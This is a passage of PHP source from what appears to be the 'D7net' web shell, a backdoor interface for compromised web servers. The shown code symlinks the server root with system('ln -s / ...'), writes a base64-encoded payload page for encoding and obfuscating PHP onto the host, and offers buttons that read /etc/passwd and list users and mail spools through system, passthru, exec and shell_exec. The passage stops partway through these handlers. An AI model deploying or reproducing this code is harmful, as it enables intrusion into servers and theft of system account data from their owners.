  1171.     echo "<center><input type='submit' class='d7net_table' value='Click Here!' name='d7'></center>";
  1172.         if (isset($_POST['d7'])){ system('ln -s / zone-h.php');         $d7='';
  1173.             $file = fopen("zone-h.php","w+"); $write = fwrite ($file ,base64_decode($d7)); $file = fopen("/","zone-h.php");
  1174.             $rt="<br><a href=zone-h.php TARGET='_blank'>";
  1175.     echo "<br><br><br><a class='d7net_table' href=zone-h.php TARGET='_blank'><b>view click here!</a></b><br><br>$rt</center>";} echo "</form>";
  1176.  
  1177. } elseif($_GET['D7net'] == 'encode') {
  1178.     echo "<form method='POST' action=''>";
  1179.     echo "<center><br><font size='6'>Encode/Decode</font><br><br>";
  1180.     echo "<center><input type='submit' class='d7net_table' value='Click Here!' name='d7encode'></center>";
  1181.         if (isset($_POST['d7encode'])){ system('ln -s / encode.php');           $d7encode='PD9waHAgDQpAaW5pX3NldCgnb3V0cHV0X2J1ZmZlcmluZycsMCk7IA0KQGluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQokdGV4dCA9ICRfUE9TVFsnbWJ1dHQnXTsNCj8+DQo8dGl0bGU+VG9vbHMgQXV0byBFbmNvZGVkL0RlY29kZWQ8L3RpdGxlPg0KPGJvZHkgPg0KPFNUWUxFPg0KYm9keSx0ZCx0aCB7YmFja2dyb3VuZDojMDAwMDAwO107YmFja2dyb3VuZDojMDAwMDAwO2JhY2tncm91bmQtc2l6ZToxMDAlOw0KYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDtmb250LWZhbWlseTogVmVyZGFuYTtmb250LXNpemU6IDEycHg7Y29sb3I6ICMwMDAwMDA7Zm9udC13ZWlnaHQ6IGJvbGQ7DQpiYWNrZ3JvdW5kLWF0dGFjaG1lbnQ6Zml4ZWQ7fQ0KPC9TVFlMRT4NCiAgPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCiBib2R5IHsNCiAgYmFja2dyb3VuZC1pbWFnZTogdXJsKCIuLi93YWxscGFwZXJjYXZlLmNvbS93cC8yaUZXcXdhLmpwZyIpOw0KICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0Ow0KICBiYWNrZ3JvdW5kLWF0dGFjaG1lbnQ6IGZpeGVkOw0KICBiYWNrZ3JvdW5kLXNpemU6IGNvdmVyOw0KICBjdXJzb3I6IHVybCgnLi4vd3d3LnpvbmUtaC5vcmcvaW1hZ2VzL3N0YXIuZ2lmJyksZGVmYXVsdDsNCiAgYmFja2dyb3VuZC1jb2xvcjogYmxhY2s7DQp9DQogYm9keSB7DQogIHRleHQtc2hhZG93OiAwcHggMHB4IDRweDsNCiAgZm9udDogOTkgNzBweC8wLjkgJ1J1c3NvIE9uZScsIHBhcHlydXM7DQp9DQogICAgaDIgew0KICB0ZXh0LXNoYWRvdzogMHB4IDBweCA0cHg7DQogIGZvbnQ6IDk5IDYwcHgvMC45ICdTYXRpc2Z5JywgcGFweXJ1czsNCn0NCiAgICBoMyB7DQogIHRleHQtc2hhZG93OiAwcHggMHB4IDRweDsNCiAgZm9udDogOTAgNzBweC8wLjkgJ1Rla28nLCBwYXB5cnVzOw0KfQ0KICAgIGEgew0KICB0ZXh0LXNoYWRvdzogMHB4IDBweCA0cHg7DQogIGZvbnQ6IDkwIDcwcHgvMC45ICdTYXRpc2Z5JywgcGFweXJ1czsNCn0NCiAgICBhOmhvdmVyIHsNCiAgdGV4dC1zaGFkb3c6IDBweCAwcHggNHB4Ow0KICBmb250OiA5OSA5MHB4LzAuOSAnU2F0aXNmeScsIHBhcHlydXM7DQp9DQogIA0KICBALW1vei1rZXlmcmFtZXMgc2JsaW5rZXIgeyAgDQogMCUgeyAtd2Via2l0LWZpbHRlcjogYmx1cig1cHgpOw0KLW1vei1maWx0ZXI6IGJsdXIoNXB4KTsNCi1vLWZpbHRlcjogYmx1cig1cHgpOw0KLW1zLWZpbHRlcjogYmx1cig1cHgpOw0KZmlsdGVyOiBibHVyKDVweCk7IH0gDQogICAgMjUlIHsgLXdlYmtpdC1maWx0ZXI6IGJsdXIoM3B4KTsNCi1tb3otZmlsdGVyOiBibHVyKDNweCk7DQotby1maWx0ZXI6IGJsdXIoM3B4KTsNCi1tcy1maWx0ZXI6IGJsdXIoM3B4KTsNCmZpbHRlcjogYmx1cigzcHgpOyB9DQo1MCUgeyAtd2Via2l0LWZpbHRlcjogYmx1cigzcHgpOw0KLW1vei1maWx0ZXI6IGJsdXIoM3B4KTsNCi1vLWZpbHRlcjogYmx1cigzcHgpOw0KLW1zLWZpbHRlcjogYmx1cigzcHgpOw0KZmlsdGVyOiBibHVyKDBweCk7IH0NCjc1JSB7IC13ZWJraXQtZmlsdGVyOiBibHVyKDNweCk7DQotbW96LWZpbHRlcjogYmx1cigzcHgpOw0KLW8tZmlsdGVyOiBibHVyKDNweCk7DQotbXMtZmlsdGVyOiBibHVyKDNweCk7DQpmaWx0ZXI6IGJsdXIoM3B4KTsgfQ0KICAgIDEwMCUgeyAtd2Via2l0LWZpbHRlcjogYmx1cigxcHgpOw0KLW1vei1maWx0ZXI6IGJsdXIoMXB4KTsNCi1vLWZpbHRlcjogYmx1cigxcHgpOw0KLW1zLWZpbHRlcjogYmx1cigxcHgpOw0KZmlsdGVyOiBibHVyKDVweCk7IH0NCn0NCg0KQC13ZWJraXQta2V5ZnJhbWVzIHNibGlua2VyIHsgIA0KIDAlIHsgLXdlYmtpdC1maWx0ZXI6IGJsdXIoNXB4KTsNCi1tb3otZmlsdGVyOiBibHVyKDVweCk7DQotby1maWx0ZXI6IGJsdXIoNXB4KTsNCi1tcy1maWx0ZXI6IGJsdXIoNXB4KTsNCmZpbHRlcjogYmx1cig1cHgpOyB9IA0KICAgIDI1JSB7IC13ZWJraXQtZmlsdGVyOiBibHVyKDNweCk7DQotbW96LWZpbHRlcjogYmx1cigzcHgpOw0KLW8tZmlsdGVyOiBibHVyKDNweCk7DQotbXMtZmlsdGVyOiBibHVyKDNweCk7DQpmaWx0ZXI6IGJsdXIoM3B4KTsgfQ0KNTAlIHsgLXdlYmtpdC1maWx0ZXI6IGJsdXIoM3B4KTsNCi1tb3otZmlsdGVyOiBibHVyKDNweCk7DQotby1maWx0ZXI6IGJsdXIoM3B4KTsNCi1tcy1maWx0ZXI6IGJsdXIoM3B4KTsNCmZpbHRlcjogYmx1cigwcHgpOyB9DQo3NSUgeyAtd2Via2l0LWZpbHRlcjogYmx1cigzcHgpOw0KLW1vei1maWx0ZXI6IGJsdXIoM3B4KTsNCi1vLWZpbHRlcjogYmx1cigzcHgpOw0KLW1zLWZpbHRlcjogYmx1cigzcHgpOw0KZmlsdGVyOiBibHVyKDNweCk7IH0NCiAgICAxMDAlIHsgLXdlYmtpdC1maWx0ZXI6IGJsdXIoMXB4KTsNCi1tb3otZmlsdGVyOiBibHVyKDFweCk7DQotby1maWx0ZXI6IGJsdXIoMXB4KTsNCi1tcy1maWx0ZXI6IGJsdXIoMXB4KTsNCmZpbHRlcjogYmx1cig1cHgpOyB9DQp9DQoNCkBrZXlmcmFtZXMgc2JsaW5rZXIgeyAgDQogMCUgeyAtd2Via2l0LWZpbHRlcjogYmx1cig1cHgpOw0KLW1vei1maWx0ZXI6IGJsdXIoNXB4KTsNCi1vLWZpbHRlcjogYmx1cig1cHgpOw0KLW1zLWZpbHRlcjogYmx1cig1cHgpOw0KZmlsdGVyOiBibHVyKDVweCk7IH0gDQogICAgMjUlIHsgLXdlYmtpdC1maWx0ZXI6IGJsdXIoM3B4KTsNCi1tb3otZmlsdGVyOiBibHVyKDNweCk7DQotby1maWx0ZXI6IGJsdXIoM3B4KTsNCi1tcy1maWx0ZXI6IGJsdXIoM3B4KTsNCmZpbHRlcjogYmx1cigzcHgpOyB9DQo1MCUgeyAtd2Via2l0LWZpbHRlcjogYmx1cigzcHgpOw0KLW1vei1maWx0ZXI6IGJsdXIoM3B4KTsNCi1vLWZpbHRlcjogYmx1cigzcHgpOw0KLW1zLWZpbHRlcjogYmx1cigzcHgpOw0KZmlsdGVyOiBibHVyKDBweCk7IH0NCjc1JSB7IC13ZWJraXQtZmlsdGVyOiBibHVyKDNweCk7DQotbW96LWZpbHRlcjogYmx1cigzcHgpOw0KLW8tZmlsdGVyOiBibHVyKDNweCk7DQotbXMtZmlsdGVyOiBibHVyKDNweCk7DQpmaWx0ZXI6IGJsdXIoM3B4KTsgfQ0KICAgIDEwMCUgeyAtd2Via2l0LWZpbHRlcjogYmx1cigxcHgpOw0KLW1vei1maWx0ZXI6IGJsdXIoMXB4KTsNCi1vLWZpbHRlcjogYmx1cigxcHgpOw0KLW1zLWZpbHRlcjogYmx1cigxcHgpOw0KZmlsdGVyOiBibHVyKDVweCk7IH0NCn0NCg0KLmJsaW5rX21ley13ZWJraXQtYW5pbWF0aW9uLW5hbWU6YmxpbmtlcjsNCi13ZWJraXQtYW5pbWF0aW9uLWR1cmF0aW9uOjFzOy13ZWJraXQtYW5pbWF0aW9uLXRpbWluZy1mdW5jdGlvbjpsaW5lYXI7LXdlYmtpdC1hbmltYXRpb24taXRlcmF0aW9uLWNvdW50OmluZmluaXRlOy1tb3otYW5pbWF0aW9uLW5hbWU6YmxpbmtlcjsNCi1tb3otYW5pbWF0aW9uLWR1cmF0aW9uOjFzOy1tb3otYW5pbWF0aW9uLXRpbWluZy1mdW5jdGlvbjpsaW5lYXI7LW1vei1hbmltYXRpb24taXRlcmF0aW9uLWNvdW50OmluZmluaXRlO2FuaW1hdGlvbi1uYW1lOmJsaW5rZXI7DQphbmltYXRpb24tZHVyYXRpb246MXM7YW5pbWF0aW9uLXRpbWluZy1mdW5jdGlvbjpsaW5lYXI7YW5pbWF0aW9uLWl0ZXJhdGlvbi1jb3VudDppbmZpbml0ZTt9QC1tb3ota2V5ZnJhbWVzIGJsaW5rZXIgeyAgDQogICANCg0KIDAlIHsgb3BhY2l0eTogMS4wOw0KICB0ZXh0LXNoYWRvdzowcHggMHB4IDZweCBncmVlbjsgfSA1MCUgeyBvcGFjaXR5OiAwLjA7IH0NCiAgICAxMDAlIHsgb3BhY2l0eTogMS4wOyB9DQp9DQoNCkAtd2Via2l0LWtleWZyYW1lcyBibGlua2VyIHsgIA0KICAgIDAlIHsgb3BhY2l0eTogMS4wOyB9DQogICAgNTAlIHsgb3BhY2l0eTogMC4wOyB9DQogICAgMTAwJSB7IG9wYWNpdHk6IDEuMDsgfQ0KfQ0KDQpAa2V5ZnJhbWVzIGJsaW5rZXIgeyAgDQogICAgMCUgeyBvcGFjaXR5OiAxLjA7DQogIHRleHQtc2hhZG93OjBweCAwcHggMjBweCBncmVlbjsgfQ0KICAgIDUwJSB7IG9wYWNpdHk6IDAuMDsgfQ0KICAgIDEwMCUgeyBvcGFjaXR5OiAxLjA7IH0NCn0NCiAgICANCiAgICANCiAgPC9zdHlsZT4NCiAgPGxpbmsgaHJlZj0naHR0cDovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9UnVzc28gT25lfFNhdGlzZnl8VGVrbycgcmVsPSdzdHlsZXNoZWV0JyB0eXBlPSd0ZXh0L2Nzcyc+DQogIA0KICA8L2hlYWQ+PGJvZHk+PGNlbnRlcj48ZGl2IGNsYXNzPSJzYmx1ciI+PGZvbnQgY29sb3I9IndoaXRlIj4gPHNwYW4gY2xhc3M9ImJsaW5rX21lIj5EN25ldDwvc3Bhbj48L2ZvbnQ+DQogIDxicj48L2JyPg0KIA0KPGNlbnRlcj4NCjxicj4NCjxicj4NCjxmb3JtIG1ldGhvZD0icG9zdCI+PGJyPg0KPHRleHRhcmVhIGNsYXNzPSdpbnB1dHonIGNvbHM9MzAgcm93cz01IG5hbWU9Im1idXR0IiBzdHlsZT0iYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpyZWQ7Ij48L3RleHRhcmVhPjxicj48YnI+DQo8c2VsZWN0IGNsYXNzPSdpbnB1dHonIHNpemU9IjEiIG5hbWU9Im9wZSIgc3R5bGU9ImJhY2tncm91bmQ6Z3JleTtjb2xvcjpibGFjazsiPg0KPG9wdGlvbiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPjxjZW50ZXI+fiBTZWxlY3Qgfjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0idXJsZW5jb2RlIiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPnVybDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iYmFzZTY0IiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPkJhc2U2NDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0idXIiIHN0eWxlPSdiYWNrZ3JvdW5kOnRyYW5zcGFyZW50O2NvbG9yOmJsYWNrOyc+Y29udmVydF91dTwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0ianNvbiIgc3R5bGU9J2JhY2tncm91bmQ6dHJhbnNwYXJlbnQ7Y29sb3I6YmxhY2s7Jz5qc29uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSJnemluZmxhdGVzIiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPmd6aW5mbGF0ZSAtIGJhc2U2NDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0ic3RyMiIgc3R5bGU9J2JhY2tncm91bmQ6dHJhbnNwYXJlbnQ7Y29sb3I6YmxhY2s7Jz5zdHJfcm90MTMgLSBiYXNlNjQ8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9Imd6aW5mbGF0ZSIgc3R5bGU9J2JhY2tncm91bmQ6dHJhbnNwYXJlbnQ7Y29sb3I6YmxhY2s7Jz5zdHJfcm90MTMgLSBnemluZmxhdGUgLSBiYXNlNjQ8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9Imd6aW5mbGF0ZXIiIHN0eWxlPSdiYWNrZ3JvdW5kOnRyYW5zcGFyZW50O2NvbG9yOmJsYWNrOyc+Z3ppbmZsYXRlIC0gc3RyX3JvdDEzIC0gYmFzZTY0PC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSJnemluZmxhdGV4IiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPmd6aW5mbGF0ZSAtIHN0cl9yb3QxMyAtIGd6aW5mbGF0ZSAtIGJhc2U2NDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iZ3ppbmZsYXRldyIgc3R5bGU9J2JhY2tncm91bmQ6dHJhbnNwYXJlbnQ7Y29sb3I6YmxhY2s7Jz5zdHJfcm90MTMgLSBjb252ZXJ0X3V1IC0gdXJsIC0gZ3ppbmZsYXRlIC0gc3RyX3JvdDEzIC0gYmFzZTY0IC0gY29udmVydF91dSAtIGd6aW5mbGF0ZSAtIHVybCAtIHN0cl9yb3QxMyAtIGd6aW5mbGF0ZSAtIGJhc2U2NDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0ic3RyIiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPnN0cl9yb3QxMyAtIGd6aW5mbGF0ZSAtIHN0cl9yb3QxMyAtIGJhc2U2NDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0idXJsIiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPmJhc2U2NCAtIGd6aW5mbGF0ZSAtIHN0cl9yb3QxMyAtIGNvbnZlcnRfdXUgLSBnemluZmxhdGUgLSBiYXNlNjQ8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9ImhleGVuY29kZSIgc3R5bGU9J2JhY2tncm91bmQ6dHJhbnNwYXJlbnQ7Y29sb3I6YmxhY2s7Jz5IZXggRW5jb2RlL0RlY29kZTwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0ibWQ1IiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPjxjZW50ZXI+TUQ1IEhhc2g8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9InNoYTEiIHN0eWxlPSdiYWNrZ3JvdW5kOnRyYW5zcGFyZW50O2NvbG9yOmJsYWNrOyc+U0hBMSBIYXNoPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSJzdHJfcm90MTMiIHN0eWxlPSdiYWNrZ3JvdW5kOnRyYW5zcGFyZW50O2NvbG9yOmJsYWNrOyc+Uk9UMTMgSGFzaDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0ic3RybGVuIiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPnN0cmxlbjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0ieHh4IiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPnVuZXNjYXBlPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSJiYmIiIHN0eWxlPSdiYWNrZ3JvdW5kOnRyYW5zcGFyZW50O2NvbG9yOmJsYWNrOyc+Y2hhckF0PC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSJhYWEiIHN0eWxlPSdiYWNrZ3JvdW5kOnRyYW5zcGFyZW50O2NvbG9yOmJsYWNrOyc+Y2hyIC0gYmluMmhleCAtIHN1YnN0cjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0id3d3IiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPmNocjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0ic3NzIiBzdHlsZT0nYmFja2dyb3VuZDp0cmFuc3BhcmVudDtjb2xvcjpibGFjazsnPmh0bWxzcGVjaWFsY2hhcnM8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9ImVlZSIgc3R5bGU9J2JhY2tncm91bmQ6dHJhbnNwYXJlbnQ7Y29sb3I6YmxhY2s7Jz5lc2NhcGU8L29wdGlvbj48L3NlbGVjdD4gIDxpbnB1dCBjbGFzcz0naW5wdXR6YnV0JyB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1Ym1pdCcgdmFsdWU9J0VuY29kZScgc3R5bGU9ImJhY2tncm91bmQ6dHJhbnNwYXJlbnQ7Y29sb3I6cmVkOyI+DQo8aW5wdXQgY2xhc3M9J2lucHV0emJ1dCcgdHlwZT0nc3VibWl0JyBuYW1lPSdjcmFjaycgdmFsdWU9J0RlY29kZScgc3R5bGU9ImJhY2tncm91bmQ6dHJhbnNwYXJlbnQ7Y29sb3I6cmVkOyI+PGJyPg0KPC9zZWxlY3Q+Jm5ic3A7DQo8L2Zvcm0+DQo8P3BocCANCiRzdWJtaXQgPSAkX1BPU1RbJ3N1Ym1pdCddOw0KaWYgKGlzc2V0KCRzdWJtaXQpKXsNCiRvcCA9ICRfUE9TVFsib3BlIl07DQpzd2l0Y2ggKCRvcCkge2Nhc2UgJ2Jhc2U2NCc6ICRjb2RpPWJhc2U2NF9lbmNvZGUoJHRleHQpOw0KYnJlYWs7Y2FzZSAnc3RyJyA6ICRjb2RpPShiYXNlNjRfZW5jb2RlKHN0cl9yb3QxMyhnemRlZmxhdGUoc3RyX3JvdDEzKCR0ZXh0KSkpKSk7DQpicmVhaztjYXNlICdqc29uJyA6ICRjb2RpPWpzb25fZW5jb2RlKHV0ZjhfZW5jb2RlKCR0ZXh0KSk7DQpicmVhaztjYXNlICdnemluZmxhdGUnIDogJGNvZGk9YmFzZTY0X2VuY29kZShnemRlZmxhdGUoc3RyX3JvdDEzKCR0ZXh0KSkpOw0KYnJlYWs7Y2FzZSAnZ3ppbmZsYXRlcicgOiAkY29kaT1iYXNlNjRfZW5jb2RlKHN0cl9yb3QxMyhnemRlZmxhdGUoJHRleHQpKSk7DQpicmVhaztjYXNlICdnemluZmxhdGV4JyA6ICRjb2RpPWJhc2U2NF9lbmNvZGUoZ3pkZWZsYXRlKHN0cl9yb3QxMyhnemRlZmxhdGUoJHRleHQpKSkpOw0KYnJlYWs7Y2FzZSAnZ3ppbmZsYXRldycgOiAkY29kaT1iYXNlNjRfZW5jb2RlKGd6ZGVmbGF0ZShzdHJfcm90MTMocmF3dXJsZW5jb2RlKGd6ZGVmbGF0ZShjb252ZXJ0X3V1ZW5jb2RlKGJhc2U2NF9lbmNvZGUoc3RyX3JvdDEzKGd6ZGVmbGF0ZShjb252ZXJ0X3V1ZW5jb2RlKHJhd3VybGRlY29kZShzdHJfcm90MTMoJHRleHQpKSkpKSkpKSkpKSk7DQpicmVhaztjYXNlICdnemluZmxhdGVzJyA6ICRjb2RpPWJhc2U2NF9lbmNvZGUoZ3pkZWZsYXRlKCR0ZXh0KSk7DQpicmVhaztjYXNlICdzdHIyJyA6ICRjb2RpPWJhc2U2NF9lbmNvZGUoc3RyX3JvdDEzKCR0ZXh0KSk7DQpicmVhaztjYXNlICd1cmxlbmNvZGUnIDogJGNvZGk9cmF3dXJsZW5jb2RlKCR0ZXh0KTsNCmJyZWFrO2Nhc2UgJ2hleGVuY29kZScgOiAkY29kaT1iaW4yaGV4KCR0ZXh0KTsNCmJyZWFrO2Nhc2UgJ21kNScgOiAkY29kaT1tZDUoJHRleHQpOw0KYnJlYWs7Y2FzZSAndXInIDogJGNvZGk9Y29udmVydF91dWVuY29kZSgkdGV4dCk7DQpicmVhaztjYXNlICdzdHJfcm90MTMnIDogJGNvZGk9c3RyX3JvdDEzKCR0ZXh0KTsNCmJyZWFrO2Nhc2UgJ3NoYTEnIDogJGNvZGk9c2hhMSgkdGV4dCk7DQpicmVhaztjYXNlICdzdHJsZW4nIDogJGNvZGk9c3RybGVuKCR0ZXh0KTsNCmJyZWFrO2Nhc2UgJ3h4eCcgOiAkY29kaT1zdHJsZW4oYmluMmhleCgkdGV4dCkpOw0KYnJlYWs7Y2FzZSAnYmJiJyA6ICRjb2RpPWh0bWxlbnRpdGllcyh1dGY4X2RlY29kZSgkdGV4dCkpOw0KYnJlYWs7Y2FzZSAnYWFhJyA6ICRjb2RpPWNocihiaW4yaGV4KHN1YnN0cigkdGV4dCkpKTsNCmJyZWFrO2Nhc2UgJ3d3dycgOiAkY29kaT1jaHIoJHRleHQpOw0KYnJlYWs7Y2FzZSAnc3NzJyA6ICRjb2RpPWh0bWxzcGVjaWFsY2hhcnMoJHRleHQpOw0KYnJlYWs7Y2FzZSAnZWVlJyA6ICRjb2RpPWFkZHNsYXNoZXMoJHRleHQpOw0KYnJlYWs7Y2FzZSAndXJsJyA6ICRjb2RpPWJhc2U2NF9lbmNvZGUoZ3pkZWZsYXRlKGNvbnZlcnRfdXVlbmNvZGUoc3RyX3JvdDEzKGd6ZGVmbGF0ZShiYXNlNjRfZW5jb2RlKCR0ZXh0KSkpKSkpOw0KYnJlYWs7ZGVmYXVsdDpicmVhazt9fQ0KDQokc3VibWl0ID0gJF9QT1NUWydjcmFjayddOw0KaWYgKGlzc2V0KCRzdWJtaXQpKXsNCiRvcCA9ICRfUE9TVFsib3BlIl07DQpzd2l0Y2ggKCRvcCkge2Nhc2UgJ2Jhc2U2NCc6ICRjb2RpPWJhc2U2NF9kZWNvZGUoJHRleHQpOw0KYnJlYWs7Y2FzZSAnc3RyJyA6ICRjb2RpPXN0cl9yb3QxMyhnemluZmxhdGUoc3RyX3JvdDEzKGJhc2U2NF9kZWNvZGUoKCR0ZXh0KSkpKSk7DQpicmVhaztjYXNlICdqc29uJyA6ICRjb2RpPXV0ZjhfZGVuY29kZShqc29uX2RlbmNvZGUoJHRleHQpKTsNCmJyZWFrO2Nhc2UgJ2d6aW5mbGF0ZScgOiAkY29kaT1zdHJfcm90MTMoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJHRleHQpKSk7DQpicmVhaztjYXNlICdnemluZmxhdGVyJyA6ICRjb2RpPWd6aW5mbGF0ZShzdHJfcm90MTMoYmFzZTY0X2RlY29kZSgkdGV4dCkpKTsNCmJyZWFrO2Nhc2UgJ2d6aW5mbGF0ZXgnIDogJGNvZGk9Z3ppbmZsYXRlKHN0cl9yb3QxMyhnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkdGV4dCkpKSk7DQpicmVhaztjYXNlICdnemluZmxhdGV3JyA6ICRjb2RpPXN0cl9yb3QxMyhyYXd1cmxkZWNvZGUoY29udmVydF91dWRlY29kZShnemluZmxhdGUoc3RyX3JvdDEzKGJhc2U2NF9kZWNvZGUoY29udmVydF91dWRlY29kZShnemluZmxhdGUocmF3dXJsZGVjb2RlKHN0cl9yb3QxMyhnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkdGV4dCkpKSkpKSkpKSkpKTsNCmJyZWFrO2Nhc2UgJ2d6aW5mbGF0ZXMnIDogJGNvZGk9Z3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJHRleHQpKTsNCmJyZWFrO2Nhc2UgJ3N0cjInIDogJGNvZGk9c3RyX3JvdDEzKGJhc2U2NF9kZWNvZGUoJHRleHQpKTsNCmJyZWFrO2Nhc2UgJ3VybGVuY29kZScgOiAkY29kaT1yYXd1cmxkZWNvZGUoJHRleHQpOw0KYnJlYWs7Y2FzZSAnaGV4ZW5jb2RlJyA6ICRjb2RpPXF1b3RlZF9wcmludGFibGVfZGVjb2RlKCR0ZXh0KTsNCmJyZWFrO2Nhc2UgJ3VyJyA6ICRjb2RpPWNvbnZlcnRfdXVkZWNvZGUoJHRleHQpOw0KYnJlYWs7Y2FzZSAndXJsJyA6ICRjb2RpPWJhc2U2NF9kZWNvZGUoZ3ppbmZsYXRlKHN0cl9yb3QxMyhjb252ZXJ0X3V1ZGVjb2RlKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCgkdGV4dCkpKSkpKSk7DQpicmVhaztkZWZhdWx0OmJyZWFrO319DQokaHRtbCA9IGh0bWxlbnRpdGllcyhzdHJpcHNsYXNoZXMoJGNvZGkpKTsNCmVjaG8gIjxmcm9tPjxjZW50ZXI+PHRleHRhcmVhIGNvbHM9NzAgcm93cz0yMCBzdHlsZT0nb25mb2N1cygpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6cmVkO2JhY2tncm91bmQtaW1hZ2U6IHRyYW5zcGFyZW50O29wYWNpdHk6MC40MDtiYWNrZ3JvdW5kLXNpemU6MTAwJTtiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OycgY2xhc3M9J2lucHV0eicgcmVhZG9ubHk+Ii4kaHRtbC4iPC90ZXh0YXJlYT48QlIvPjxCUi8+PC9jZW50ZXI+PC9mcm9tPiI7DQo/Pg==';
  1182.             $file = fopen("encode.php","w+"); $write = fwrite ($file ,base64_decode($d7encode)); $file = fopen("/","encode.php");
  1183.             $rt="<br><a href=encode.php TARGET='_blank'>";
  1184.     echo "<br><br><br><a class='d7net_table' href=encode.php TARGET='_blank'><b>view click here!</a></b><br><br>$rt</center>";} echo "</form>";
  1185. }elseif($_GET['D7net'] == 'passwbypass') {
  1186.     echo '<center>Bypass etc/passw With:<br>
  1187. <table style="width:50%">
  1188.   <tr>
  1189.     <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  1190.     <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  1191.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  1192.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  1193.     <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  1194. </tr></table>Bypass User With : <table style="width:50%">
  1195. <tr>
  1196.     <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  1197.     <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  1198.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  1199.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  1200.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  1201. </tr>
  1202. </table><br>';
  1203.  
  1204.  
  1205. if ($_POST['awkuser']) {
  1206. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1207. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  1208. echo "</textarea><br>";
  1209. }
  1210. if ($_POST['systuser']) {
  1211. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1212. echo system("ls /var/mail");
  1213. echo "</textarea><br>";
  1214. }
  1215. if ($_POST['passthuser']) {
  1216. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1217. echo passthru("ls /var/mail");
  1218. echo "</textarea><br>";
  1219. }
  1220. if ($_POST['exuser']) {
  1221. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1222. echo exec("ls /var/mail");
  1223. echo "</textarea><br>";
  1224. }
  1225. if ($_POST['shexuser']) {
  1226. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1227. echo shell_exec("ls /var/mail");
  1228. echo "</textarea><br>";
  1229. }
  1230. if($_POST['syst'])
  1231. {
  1232. echo"<textarea class='inputz' cols='65' rows='15'>";
  1233. echo system("cat /etc/passwd");
  1234. echo"</textarea><br><br><b></b><br>";
  1235. }
  1236. if($_POST['passth'])
  1237. {
  1238. echo"<textarea class='inputz' cols='65' rows='15'>";
  1239. echo passthru("cat /etc/passwd");
  1240. echo"</textarea><br><br><b></b><br>";
  1241. }
  1242. if($_POST['ex'])
  1243. {
  1244. echo"<textarea class='inputz' cols='65' rows='15'>";
  1245. echo exec("cat /etc/passwd");
